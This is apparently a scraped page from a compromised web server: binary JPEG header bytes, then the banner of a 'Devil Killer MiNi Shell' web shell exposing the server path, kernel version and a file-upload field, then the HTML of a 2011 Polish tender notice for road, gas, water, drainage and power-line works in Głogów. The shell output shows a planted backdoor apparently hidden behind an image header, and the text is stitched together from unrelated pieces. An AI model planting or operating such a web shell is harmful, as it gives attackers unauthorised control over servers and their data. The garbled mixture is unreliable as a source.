JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110311/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110311/42498-N-2011.html

<p class="kh_header"><b>Głogów: Wykonanie II etapu zadania pn.: Przebudowa ciągu komunikacyjnego                od ronda poprzez ulice: Bolesława Krzywoustego, Wały Bolesława Chrobrego,  ul. Piastowską wraz z przebudową skrzyżowania ul. Piastowskiej                       z ul. Kazimierza Wielkiego</b><br>
<b>Numer ogłoszenia: 42498 - 2011; data zamieszczenia: 11.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie II etapu zadania pn.: Przebudowa ciągu komunikacyjnego                od ronda poprzez ulice: Bolesława Krzywoustego, Wały Bolesława Chrobrego,  ul. Piastowską wraz z przebudową skrzyżowania ul. Piastowskiej                       z ul. Kazimierza Wielkiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Branża drogowa

 Jezdnie główne Z   KR3   a  ronda  KR5.
Zadanie obejmuje :
-	wykonanie  drugiej  jezdni na całym przebudowywanym odcinku drogi  gminnej długości  ok. 1,1 km, wykonanie pasów rozdziału obu jezdni,
-	przebudowę głównych  skrzyżowań w ronda, tzn.  skrzyżowanie ul. Kołłataja                            z   ul. Bolesława Krzywoustego Wały Chrobrego,  skrzyżowanie  ul. Wały Chrobrego                         z ul. Piastowską,  skrzyżowanie ul. Rudnowskiej  z  ul. Kazimierza Wielkiego,
-	przebudowe  przepustu  mostu nad  strumykiem Sępolno,
-	przebudowę fragmentów ulic  przyległych do głównego ciągu,
-	przebudowę i budowę chodników i  ścieżek rowerowych,
-	budowę nowego ciągu pieszo jezdnego w rejonie ulic Witosa i Narutowicza, budowę zatok autobusowych i pętli wyrównawczej

Zestawienie  elementów : dokładne ilości w przedmiarach
-	jezdnie głównego ciągu komunikacyjnego  -  10 603.00 m2
-	jezdnie rond                                                  -    2 513.00 m2
-	zatoki autobusowe                                        -       105.00 m2
-	jezdnie pozostałych wlotów                         -    2 723.00 m2
-	pierścienie i  zabruki                                    -        182.00 m2
-	zjazdy na posesje                                          -       285.00m2
-	ścieżki rowerowe                                          -    1 221.00 m2
-	chodniki i dojścia                                         -     3 900.00 m2
-	zieleń uliczna                                                -     8 962.00m2
-	skarpy                                                           -      1 780.00m2

ETAP II -  zakres na 2011 rok  ZRID
1.Połączenie tymczasowe części 1 ze stanem istniejącym
 - prace przygotowawcze usunięcie humusu, roboty ziemne, wykopy,
 - ława pod krawężniki, obrzeża i oporniki
 - oporniki z odzysku  na podsypce cement.- piaskowej 
 - profilowanie  i zagęszczanie gruntu, stabilizacja cementowo piaskowa 
   20cm, podbudowa zasadnicza i pomocnicza  z kruszywa łamanego i 
   stabilizowanego 20cm, podbudowa z betonu  asfaltowego 7 cm, 
   warstwa wiążąca z betonu  asfaltowego 6 cm i nawierzchnia z betonu 
   asfaltowego SMA 4 cm
-  Ułożenie siatki na połączeniu nowej ze starą nawierzchnią 
-  znak 1 szt.
-  oznakowanie poziome 

2. Odcinek 1  ZRID 
-	karczowanie  i wywiezienie  karpin, zabezpieczenie drzew,
-	roboty pomiarowe,
-	rozebranie mechaniczne nawierzchni brukowej i ścieżek w parku,
-	rozebranie nawierzchni z mas bitumicznych
-	ręczne  rozebranie  i zabezpieczenie nawierzchni z kostki kamiennej regularnej i nieregularnej oraz chodników z płyt kamiennych do ponownego wbudowania,
-	rozebranie  chodników z płyt betonowych i nawierzchni betonowej gr. 15cm,
-	rozebranie  podbudowy z betonu gr.10cm 
-	rozebranie obrzeży trawnikowych ,
-	rozebranie i zabezpieczenie do ponownego wbudowania podbudowy z kostki kamiennej do 13 cm i oporników kamiennych  12x 20cm,
-	rozebranie znaków drogowych ,
-	rozebranie i zabezpieczenie wiat przystankowych  do ponownego wbudowania,
-	rozebranie murków oporowych, schodów betonowych oraz  ogrodzenia szkoły,
-	roboty ziemne :wykopy, przemieszczenia gruntu, korytowanie, formowanie i zagęszczanie nasypów, plantowanie oraz   zakup gruntu nadającego się na nasyp,
-	ława betonowa pod krawężniki, obrzeża i oporniki 
-	krawężniki betonowe i kamienne, obrzeża betonowe, ścieki z kostki kamiennej nieregularnej, opaska z kostki kamiennej rzędowej,
-	podbudowa pod jezdnie: profilowanie z zagęszczeniem, stabilizacja cementowo- piaskowa 20 cm, podbudowa z kruszywa kamiennego łamanego  stabilizowanego mechanicznie , podbudowa  betonowa pod  pierścień ronda, na zatokach ,
-	podbudowa z mieszanki z betonu asfaltowego  0 31,5 wraz  ze skropieniem,
-	warstwa  wiążąca z betonu asfaltowego 0 20  6 i 8 cm
-	nawierzchnie, warstwa  ścieralna  z betonu asfaltowego SMA 4 cm
-	nawierzchnia redukująca hałas z betonu asfaltowego SMA 5 cm
-	nawierzchnie z kostki rozbiórkowej na podsypce piaskowej
-	zjazdy, chodniki, opaski ścieżki rowerowe, perony autobusowe na warstwie odcinającej, podbudowie z kruszywa łamanego ,
-	nawierzchnie na zjazdach i chodnikach  z betonu asfaltowego, z kostki nieregularnej  i płyt kamiennych z odzysku, z kostki brukowej 8cm, z płyt betonowych o wymiarach 30x 30 x5,
-	zieleń- profilowanie i zagęszczanie podłoża , rozścielanie  ziemi urodzajnej, zabezpieczenie skarp o nachyleniu 1  1,5 płatami darniny z przymocowaniem kołkami do podłoża, wykonanie trawników dywanowych, ręczna pielęgnacja,
-	oznakowanie pionowe wg Projektu,
-	montaż ogrodzenia segmentowego U-12a, h=80 cm  
-	wykonanie  ogrodzenia  przy szkole
-	oznakowanie poziome
-	wykonanie  schodów terenowych
-	wykonanie  skarp wzmocnionych o nachyleniu  0.75  1
-	regulacja studzienek , włazów, zaworów wodociągowych i gazowych, włazów studni gazowych.

3. Przedłużenie przystanku wyrównawczego przy ulicy  Piastowskiej w Głogowie
-	prace  pomiarowe,
-	rozbiórka  z płyt betonowych,
-	rozbiórka  i zabezpieczenie  nawierzchni z kostki kamiennej regularnej i z płyt kamiennych do ponownego wbudowania,
-	rozebranie  podbudowy z betonu, otoczaków i brukowca i z kruszywa,
-	rozebranie krawężników betonowych,
-	rozebranie i zabezpieczenie oporników kamiennych i ścieków kamiennych do ponownego wbudowania,
-	rozebranie znaków
-	korytowanie, plantowanie przemieszczenie gruntu
-	ława  pod krawężniki, obrzeżą i oporniki z oporem = 667.000m3
-	ułożenie krawężników betonowych, oporników kamiennych, ścieków z materiału odzyskanego,
-	podbudowa pod jezdnie: profilowanie i zagęszczenie  gruntu, stabilizacja cementowo- piaskowa 20 cm, podbudowa z kruszywa łamanego , podbudowa  z betonu asfaltowego 0 31,5 gr.7 cm, oraz  podbudowa betonowa   wg projektu
-	warstwa wiążąca  z betonu asfaltowego 0 20  gr. 6 cm 
-	nawierzchnie z betonu asfaltowego SMA o gr. 4 cm 
-	nawierzchnie z odzyskanej kostki ,
-	nawierzchnie  chodników z kostki z odzysku,
-	pielęgnacja zieleni
-	znaki drogowe i oznakowanie poziome
-	regulacja  urządzeń
-	montaż wiaty z płytą fundamentową i podłączeniem tablicy świetlnej

ETAP II  - zakres  na 2012 rok

1. Odcinek 2  ZRID
-    roboty pomiarowe,
-	rozebranie ścieżek w parku oraz chodników z płyt betonowych ,
-	rozebranie nawierzchni z mas bitumicznych mechanicznie,
-	rozebranie i zabezpieczenie kostki betonowej do ponownego wbudowania ,
-	rozebranie podbudowy  z betonu gr.15cm, krawężników betonowych i obrzeży,
-	rozebranie podbudowy  i zabezpieczenie podbudowy z kostki kamiennej nieregularnej 13 cm oraz oporników kamiennych,
-	rozebranie oznakowania pionowego,
-	roboty ziemne wykopy, przemieszczenia gruntu, korytowanie, formowanie i zagęszczanie nasypów, o wysokości do 3 m , plantowanie oraz   zakup gruntu nadającego się na nasyp,
-	ława pod krawężniki, obrzeża i oporniki,
-	krawężniki betonowe 20x30 , oporniki z odzysku, obrzeża betonowe 20x8,  ścieki - opaski przykrawężnikowe z kostki z odzysku,
-	profilowanie i zagęszczenie  podłoża w gruncie kat I-III , stabilizacja  cementowo- piaskowa 20 cm, podbudowa  z kruszywa  łamanego stabilizowanego mechanicznie  20cm ,
-	podbudowa z mieszanki z betonu asfaltowego 0 31,5 gr. 8cm 14cm ze skropieniem,
-	podbudowa z betonu asfaltowego  0 31 gr. 7 cm wraz ze skropieniem,
-	ułożenie siatki na połączeniach z nową nawierzchnią,
-	warstwa wiążąca  z betonu asfaltowego 0 20 o gr. 6 i 8 cm
-	nawierzchnia  z betonu asfaltowego SMA o gr. 4 cm i  redukująca hałas 5 cm,
-	na zjazdach, chodnikach- profilowanie, zagęszczenie gruntu, warstwa odcinająca gr.190cm podbudowa  z kruszywa  łamanego stabilizowanego mechanicznie
-	nawierzchnie na zjazdach i chodnikach: z betonu asfaltowego, z kostki brukowej betonowej gr. 8 cm i z kostki nieregularnej 9 11 z odzysku,
-	zieleń- profilowanie i zagęszczanie podłoża , rozścielanie  ziemi       urodzajnej, zabezpieczenie skarp o nachyleniu 1 1,5 płatami darniny z przymocowaniem kołkami do podłoża, wykonanie trawników dywanowych, ręczna pielęgnacja,
-	oznakowanie pionowe,
-	montaż ogrodzenia segmentowego U-12, h= 0,80 cm
-	bariery ochronne stalowe
-	oznakowanie poziome
-	wykonanie skarp wzmocnionych o nachyleniu 0,75 1
-	regulacja studzienek , zaworów i włazów.




2.	Przebudowa ulicy Budowlanych od skrzyżowania z ul. Witta Stwosza do skrzyżowania z ul. I.  Daszyńskiego
-	roboty pomiarowe
-	rozebranie nawierzchni ścieżek w parku, masy mineralno-bitumicznej, płyt betonowych o wym. 50x50x7, podbudowy z betonu, otoczaków i brukowca , krawężników betonowych, obrzeży trawnikowych.
-	rozebranie nawierzchni i zabezpieczenie materiału z kostki betonowej, z kostki kamiennej nieregularnej 9 11 ,oporników kamiennych o wym. 12x20 ścieków kamiennych do ponownego  wbudowania
-	rozebranie znaków,
-	roboty ziemne- usunięcie humusu, wykopy, przemieszczenie  gruntu, plantowanie terenu, warstwa  odcinająca 10cm pod  chodniki,
-	ława pod krawężniki, obrzeża i oporniki betonowe z oporem,
-	krawężniki betonowe 20x30, oporniki z odzysku, obrzeża betonowe 20x8, opaska przykrawężnikowa z kostki z odzysku, ścieki z odzysku.
-	profilowanie i zagęszczanie podłoża pod jezdnię, stabilizacja cementowo -piaskowa 20cm,
-	podbudowa z kruszywa łamanego 0-63mm stabilizowanego mechanicznie 20 cm,
-	podbudowa  z betonu asfaltowego 0 31,5 gr. 7 cm,
-	siatka do asfaltów na połączeniach,
-	warstwa wiążąca z betonu  asfaltowego 0 20 6cm,
-	nawierzchnia z betonu asfaltowego SMA 4 cm
-	znaki drogowe,
-	oznakowanie poziome,
-	przesuniecie wpustu, regulacją urządzeń,
-	wymiana krat na  uchylne z montażem kosza.

3.	ETAP IIB  pozwolenie na budowę 
-	karczowanie, wywiezienie karpin , zabezpieczenie drzew ,
-	roboty pomiarowe
-	rozebranie nawierzchni z mas mineralno- bitumicznych, chodników z płyt, obrzeży, krawężników z ławami,  podbudowy z betonu, 
-	ręczne rozebranie i zabezpieczenie  materiału nawierzchni z kostki betonowej do ponownego wbudowania
-	rozebranie znaków drogowych,
-	roboty ziemne- usunięcie warstwy humusu, zabezpieczenie  ziemi na odkład, wykopy, przemieszczenie gruntu,  korytowanie, plantowanie, zagęszczanie nasypów,
-	formowanie  i zagęszczanie  nasypów do 3 m wysokości,
-	ława pod krawężniki, obrzeża, i oporniki  betonowe z oporem
-	krawężniki betonowe  20x30, krawężniki kamienne wystające 20x30, oporniki kamienne 12x20, obrzeżą betonowe  20x8, ścieki z kostki kamiennej z odzysku,
-	profilowanie i zagęszczanie podłoża w gruncie,
-	stabilizacja  cementowo piaskowa 20 cm,
-	podbudowa z kruszywa  łamanego  10, 15 i 20 cm,
-    podbudowa betonowa  pod pierścień ronda i zabruki,
-    podbudowa  z mieszanki z betonu asfaltowego 0 31,5  gr. 8cm  14 cm
     ze skropieniem,
-	siatka na połączeniu z istniejącą  nawierzchnią,
-	warstwa wiążąca  z betonu asfaltowego 0 20 gr.8cm ze skropieniem,
-	nawierzchnie z betonu asfaltowego SMA o gr. 5cm, ze skropieniem,
-	nawierzchnie z kostki rozbiórkowej z odzysku o wys. 14-18cm,
-	pod zjazdy, chodniki, opaski- profilowanie, zagęszczanie podłoża, warstwa odcinająca 10cm,podbudowa z kruszywa łamanego,
-	nawierzchnia na chodnikach, zjazdach- nawierzchnia betonowa, z kostki brukowej betonowej 8 cm, z kostki nieregularnej 9 11 z odzysku, z płyt betonowych 0 wym. 30x30x5, z płyt prefabrykowanych MEBA,
-	zieleń- rozścielenie ziemi urodzajnej, wykonanie trawników dywanowych, zabezpieczenie skarp o nachyleniu 1 1,5 płatami  darniny, wykonanie skarp wzmocnionych  0,75  1 , pielęgnacja,
-	znaki drogowe i oznakowanie poziome,
-	regulacja studzienek, włazów, zaworów.

4.	Przebudowa mostu nad strumykiem Sępolna w ciągu ul. Piastowskiej 
-	rozebranie nawierzchni chodników z kostki brukowej betonowej, 
     krawężników  kamiennych, nawierzchni z mieszanek bitumicznych 
     gr.12 cm, podbudowy z kruszywa  30 cm, podbudowy kamiennej na
     dojazdach do mostu, wywiezienie gruzu,
-	rozebranie podłoża z betonu żwirowego 10cm, konstrukcji 
     żelbetowych, okładzin
-	przepusty tymczasowe- wykonanie i rozbiórka przepustu z rur o 
     średnicy 1200mm,
-	elementy prefabrykowane- wg projektu
-	zbrojenie ,osadzenie kotew, deskowania, beton - wg projektu,
-	warstwa  wyrównawcza z betonu B15,
-	ściany oporowe z gruntu zbrojonego - wg projektu,
-	umocnienie skarp cieku koszami gabionowymi - wg projektu,
-	wykonanie palisady kołkami 10-12cm na głębokość wbicia 1,20m,
-	umocnienie skarp i dna  rowów brukiem  na podbudowie  z betonu B15,
-	narzut kamienny -od  strony wlotu przepustu,
-	roboty ziemne- zdjęcie humusu, wykopy dla posadowienia fundamentu przepustu, plantowanie,
-	wykonanie nasypów, wraz  z pozyskaniem gruntu, zagęszczenie,
-	powłoka  izolacyjna bitumiczna na zimno
-	izolacje przeciwwilgociowe z papy na lepiku asfaltowym na gorąco,
-	balustrady -wg projektu,
-	nawierzchnie  na chodnikach z żywic epoksydowych z dodatkiem poliuretanu o gr. min 5mm,
-	zagruntowanie i dwukrotne malowanie powierzchni konstrukcji betonowych,
-	naprawy powierzchni betonu zaprawami typu PCC.

Branża sanitarna
1)	Sieci i przyłącza gazu - Etap II zakres na 2011
-	Montaż przewodów z rur PEHD 125mm - 132,7mb
-	Montaż przewodów z rur PEHD 225mm - 148,6mb
-	Montaż rury ochronnej FI 300mm na przejściu przez drogę - 22,7mb
-	Roboty ziemne związane z ww montażami

2)	Sieci i przyłącza gazu - Etap II zakres na 2012
-	Montaż przewodów z rur PEHD 225mm - 52,3mb
-	Montaż rury ochronnej FI 300mm na przejściu przez drogę - 11,6mb

3)	Sieć wodociągowa - Etap II zakres na 2011
-	Montaż przewodów z rur PEHD 40mm - 13,0mb
-	Montaż przewodów z rur PEHD 90mm - 3,0mb 
-	Montaż przewodów z rur PEHD 110mm - 37,5mb 
-	Montaż przewodów z rur PEHD 125mm - 21,0mb
-	Montaż przewodów z rur PEHD 225mm - 447,0mb
-	Montaż hydrantów podziemnych Fi 80mm - 2 szt. 
-	Montaż rury ochronnej FI 200mm na przejściu przez drogę - 17,6mb
-	Montaż rury ochronnej FI 450mm na przejściu przez drogę - 79,8mb
-	Roboty ziemne związane z ww montażami

4)	Sieć wodociągowa - Etap II zakres na 2012
-	Montaż przewodów z rur PEHD 40mm - 3,0mb
-	Montaż przewodów z rur PEHD 90mm - 1,0mb 
-	Montaż przewodów z rur PEHD 110mm - 1,5mb 
-	Montaż przewodów z rur PEHD 125mm - 1,0mb
-	Montaż przewodów z rur PEHD 225mm - 280,0mb
-	Montaż hydrantów podziemnych Fi 80mm - 1 szt. 
-	Montaż rury ochronnej FI 450mm na przejściu przez drogę - 27,7mb
-	Roboty ziemne związane z ww montażami

5)	Sieć kanalizacji deszczowej - Etap II zakres na 2011
-	Montaż kanałów z rur PVC 200mm - 238,15mb 
-	Montaż kanałów z rur PP X-STREAM 300mm - 109,0mb 
-	Montaż kanałów z rur PP X-STREAM 400mm - 112,7mb 
-	Montaż kanałów z rur PP X-STREAM 500mm - 149,05mb 
-	Montaż kanałów z rur PP X-STREAM 600mm - 96,0mb
-	Montaż Separatora Lamelowego - 1szt.
-	Montaż osadnika V=10m3
-	Montaż studni rewizyjnych z kręgów betonowych o śr. 1000mm - 11szt.
-	Montaż studni rewizyjnych z kręgów betonowych o śr. 1200mm - 6szt.
-	Montaż studni rewizyjnych z kręgów betonowych o śr. 1500mm - 3szt.
-	Montaż studni ściekowych z gotowych elementów betonowych o śr. 500mm z osadnikiem i syfonem - 27szt.
-	Montaż klapy zwrotnej DN600mm z przeciwwagą - 1szt.
-	Demontaż studni ściekowych ulicznych o średnicy 500mm z osadnikiem i syfonem - 8 szt.
-	Zaślepienie kanalizacji sanitarnej o średnicy 200mm po demontażu wpustów - 8szt.
-	Roboty ziemne związane z ww montażami

6)	Sieć kanalizacji deszczowej - Etap II zakres na 2012
-	Montaż kanałów z rur PVC 200mm - 52,85mb 
-	Montaż kanałów z rur PP X-STREAM 400mm - 55,3mb 
-	Montaż kanałów z rur PP X-STREAM 500mm - 53,95mb 
-	Montaż studni rewizyjnych z kręgów betonowych o śr. 1200mm - 3szt.
-	Montaż studni ściekowych z gotowych elementów betonowych o śr. 500mm z osadnikiem i syfonem - 8szt.
-	Demontaż studni ściekowych ulicznych o średnicy 500mm z osadnikiem i syfonem - 18 szt.
-	Zaślepienie kanalizacji sanitarnej o średnicy 200mm po demontażu wpustów - 18szt.
-	Roboty ziemne związane z ww montażami

Branża elektryczna i telekomunikacyjna ETAP II
Telekomunikacja zakres na 2011
1.	Likwidacja linii kablowych - 1232 m
2.	Likwidacja studni kablowych - 4 szt.
3.	Likwidacja ciągów kanalizacji kablowych - 157 mb
4.	Budowa studni kablowych - 2 szt.
5.	Budowa kanalizacji kablowej - 154 mb
6.	Budowa linii teletechnicznych - 1256 m
7.	Montaż złączy przelotowych MUF - 15 szt.
8.	Budowa linii światłowodowej - 204 m
9.	Montaż złącz przelotowych - 6 szt.
Telekomunikacja zakres na 2012
1.	Budowa studni - 6 szt.
2.	Budowa kanalizacji - 369 mb
3.	Budowa linii + pomiary
4.	Kable miedziane - 3400 mb
5.	Kable światłowodowe - 356 mb
6.	Likwidacja studni 3 szt.
7.	Likwidacja kanalizacji kablowej - 257 mb
Linie elektroenergetyczne zakres na 2011
1.	Przebudowa linii śn 20kV - 205 mb kabel jednożyłowy - ST-5 - ST-45
2.	Przebudowa linii śn 20kV - 205 mb kabel jednożyłowy - ST-43 - ST-45
3.	Przebudowa linii śn 20kV - 120 mb kabel jednożyłowy - ST-45 - ST-162
4.	Przebudowa linii śn 20kV - 130 mb kabel jednożyłowy - ST-172 - GPZ Żarków
5.	Przebudowa linii śn 20kV - 120 mb kabel jednożyłowy - ST-135 - GPZ Brzegowa
6.	Przebudowa linii nn 0,4kV - 105 mb - S-44-2-1 - S-1049
7.	Przebudowa linii nn 0,4kV - 110 mb - ST-45 - S-279
8.	Przebudowa linii nn 0,4kV - 145 mb - ST-45 - S-289
9.	Przebudowa linii nn 0,4kV - 160 mb - ST-45 - S-45-5-1
10.	Przebudowa linii nn 0,4kV - oświetlenie drogowe od słupa L 44 do L 80 - 330 mb
11.	Przebudowa linii nn 0,4kV - oświetlenie drogowe od słupa L 27 do L 60 - 640 mb
Linie elektroenergetyczne zakres na 2012
1.	Przebudowa linii śn 20kV - 120 mb kabel jednożyłowy - GPZ Brzegowa - ST-135
2.	Przebudowa linii śn 20kV - 30 mb kabel jednożyłowy - GPZ Żarków - ST-172
3.	Przebudowa linii nn 0,4kV - 130 mb - S-1271 - słup nr 14
4.	Przebudowa linii nn 0,4kV - oświetlenie drogowe od słupa L 61 do L 93 - 900 mb
5.	Przebudowa linii nn 0,4kV - oświetlenie drogowe od słupa L 81 do L 92 - 800 mb.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>powtórzenie tego samego rodzaju zamówień, zgodnie z przedmiotem zamówienia stanowiących nie więcej niż 50 procent wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.13.00-8, 45.23.23.10-8, 45.23.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 200 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać wykonawcy,którzy wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru    końcowego), iż w okresie ostatnich 5 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  , wykonali roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy                   i doświadczenia, przez co należy rozumieć robotę polegającą na budowie/przebudowie drogi o nawierzchni asfaltobetonowej o długości nie mniejszej jak 1000 mb wraz                      z odwodnieniem i oświetleniem. 
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu robót budowlanych i dokumentów potwierdzających ,że roboty zostały wykonane zgodnie z zasadami sztuki budolanej i prawidlowo ukończone na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów.Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
